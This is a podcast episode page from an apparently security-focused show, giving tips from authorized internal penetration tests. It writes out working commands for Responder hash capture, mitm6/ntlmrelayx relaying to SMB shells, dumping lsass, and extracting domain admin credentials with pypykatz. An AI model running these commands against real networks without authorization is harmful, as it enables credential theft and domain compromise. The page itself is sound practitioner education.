7MS #423: Tales of Internal Pentest Pwnage - Part 18
7 Minute Security15 Juli 2020

7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

  • Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
  • Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
  • Testing for MS14-025 is easy with this site.
  • mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

  • I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

  • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

  • Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

  • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

Avsnitt(683)

7MS #51: CEH vs. OSCP (audio)

7MS #51: CEH vs. OSCP (audio)

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

7 Apr 20157min

7MS #50: OSCP – The Final Chapter – part 2! (audio)

7MS #50: OSCP – The Final Chapter – part 2! (audio)

At last, the epic conclusion of the maddening, redeeming OSCP journey. 7MS #50: OSCP – The Final Chapter – part 2! (audio)

2 Apr 20157min

7MS #49: OSCP – The Final Chapter – part 1! (audio)

7MS #49: OSCP – The Final Chapter – part 1! (audio)

We’ve arrived at the exciting two-part finale to my bloody battle with the OSCP! 7MS #49: OSCP – the final chapter – part 1! (audio)

31 Mars 20157min

7MS #48: So I Gave My Eight Year Old a Computer (audio)

7MS #48: So I Gave My Eight Year Old a Computer (audio)

Is it a good idea to give young kids a computer to play with? Maybe. Maybe not. Tune in to today’s episode and weigh in! 7MS #48: So I Gave My Eight Year Old a Computer (audio)

21 Mars 20158min

7MS #47: Logging and Alerting RELOADED (audio)

7MS #47: Logging and Alerting RELOADED (audio)

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment…stuff you might want to turn on. Check out that information via this PDF here. 7MS #47: Logging and Alerting Reloaded (audio)

17 Mars 20157min

7MS #46: So You Want to be a Hacker? (audio)

7MS #46: So You Want to be a Hacker? (audio)

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers – and hacking – has changed (and hopefully matured). 7MS #46: So You Want to be a…

14 Mars 20157min

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it’s funny how a letter from the Comcast legal dept. will change your mind and let you see piracy in a whole new light! 7MS #45: OFFTOPIC – Why I Stopped Pirating Software (audio)

10 Mars 20157min

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

Warning, this is an off topic episode! Did you know it’s fun to stay at the YMCA? Did you also know it’s fun to annoy annoying people at the YMCA? Listen to this episode to find out why. 7MS #44: OFFTOPIC – Annoying People at the YMCA (audio)

7 Mars 20157min

Populärt inom Politik & nyheter

p3-krim
svd-dokumentara-berattelser-2
flashback-forever
rss-krimstad
rss-vad-fan-hande
olyckan-inifran
aftonbladet-daily
rss-viva-fotboll
rss-sanning-konsekvens
svenska-fall
krimmagasinet
fordomspodden
motiv
blenda-2
dagens-eko
rss-frandfors-horna
rss-expressen-dok
svd-nyhetsartiklar
spar
spotlight